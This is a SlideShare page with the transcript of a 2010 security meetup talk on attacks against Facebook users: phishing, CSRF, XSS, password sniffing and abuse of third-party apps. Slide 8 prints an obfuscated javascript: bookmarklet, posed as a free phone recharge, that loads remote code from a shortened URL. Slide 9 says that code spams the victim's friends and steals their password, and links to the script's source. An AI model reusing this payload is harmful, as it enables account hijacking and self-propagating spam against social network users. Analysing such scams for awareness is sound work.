Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.

Like this presentation? Why not share!

Like this? Share it with your network


Facebook Attacks



Facebook Attacks by Dinesh @ null Hyderabad Meet, October, 2010

Facebook Attacks by Dinesh @ null Hyderabad Meet, October, 2010



Total Views
Views on SlideShare
Embed Views



4 Embeds 336

http://www.room702.cn 195
http://null.co.in 139
http://static.slidesharecdn.com 1 1



Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
  • free download the updated file from here:-http://gg.gg/yi7pn
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

Facebook Attacks Presentation Transcript

  • 1. facebook attacks
  • 2.
    • Phising
    • CSRF attack
    • Java scripts
    • XSS
  • 3. Facebook Phising
  • 4. Facebook CSRF attack Third party app server
  • 5.  
  • 6.
    • There are many other attacks possible like
    • Brute forcing
    • Cookie stealing
    • Commercial Data mining
    • Database Reverse-Engineering
  • 7. Password Interception
    • The fact that the username and password were sent in clear text is a security vulnerability.
    • There are chances to read Facebook user names and passwords off of the Ethernet or unencrypted wireless traffic, obtaining access to users’ Facebook passwords, as well as any additional accounts they use those passwords for.
    • Also the tabnabbing and CSRF have gained popularity over the open platform
    Current Facebook Precaution: Facebook currently takes no steps to protect user passwords in transit .
  • 8. javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//su%22+%22.%22+%22ly%22+%22/%22+%222wL%22;void(0) FREE!! CELLPHONE RECHARGE::.. This Script very popularly seen on Facebook, Orkut and Many other Social Networking sites. Analysing and Demo
  • 9.
    • What does It do?
    • It is  sending messages to all my friends to Recharge from account
    • It is adding comments  in Albums of my friends
    • It is  creating Threads in the Communities I Joined saying that “Recharge this” also its  adding some other Communities to my list
    • Redirects you to the Fake FB login page after 10-15 mins stealing your password
    Source Script @ http://www.mediafire.com/?t2lagmvsvftww28
  • 10. http://www.facebook.com/profile.php?id=100000781542573 www.facebook.com/username
  • 11. The Facebook Platform API – The API defines the various methods through which you can interact with Facebook. If you’re not familiar with the idea of an API, take a look at some recent Digital Web articles: APIs and Mashups for the Rest of Us and Hacking on Open APIs. FBML – Facebook Markup Language is a custom markup language based on various bits of HTML. It’s similar to Coldfusion or ASP.NET’s tag-based syntax, and is used to define the pages in your application. FQL – Facebook Query Language is SQL for Facebook. A powerful query language for situations where there are no existing helper methods in the API, or handy tags in FBML, to do exactly what you need.
  • 12. How to add an application in Facebook
  • 13. How can this be Used For Exploiting?
    • You can Upload your own Application of any type.
    • So doesn’t this strike you something of a hackers insterest
  • 14. How can this be Used For Exploiting?
  • 15.  
  • 16. THANK YOU